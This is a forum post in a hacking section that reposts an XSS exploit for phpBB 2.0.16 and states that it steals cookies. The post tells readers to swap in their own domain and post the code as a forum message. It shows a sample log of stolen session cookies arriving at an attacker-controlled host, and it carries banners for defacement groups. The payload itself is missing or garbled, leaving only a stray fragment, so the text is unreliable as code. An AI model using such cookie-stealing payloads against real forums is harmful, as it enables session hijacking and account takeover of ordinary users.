Jump to content
RedJoker

phpBB 2.0.16 XSS Remote Cookie Disclosure Exploit

By RedJoker, in Programe hacking

Recommended Posts

RedJoker Newbie

RedJoker

Posted
Posted
/*

1) Change milw0rm.com to your domain.com

2) Post the below code into a new message.

Example Output:

***.**.***.*** - - [09/Jul/2005:03:09:13 -0500]

"GET /cgi-bin/shell.jpg?phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%223%22%3B%7D;%20phpbb2mysql_sid=898eeaa6ea3c9848a60121d3450a1287;%20phpbb2mysql_t=a%3A1%3A%7Bi%3A3%3Bi%3A1120845509%3B%7D HTTP/1.1" 404 305 "http://tester/phpBB2/viewtopic.php?t=3"

/str0ke

*/

******************************************************************************************************

* CCTEAM PhpBB 2.0.16 XSS EXPLOIT *

* Powered by D|ablo CCTEAM *

******************************************************************************************************

www.ut'

******************************************************************************************************

* http://ccteam.ru/ *

* http://defacers.ru/ *

******************************************************************************************************

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...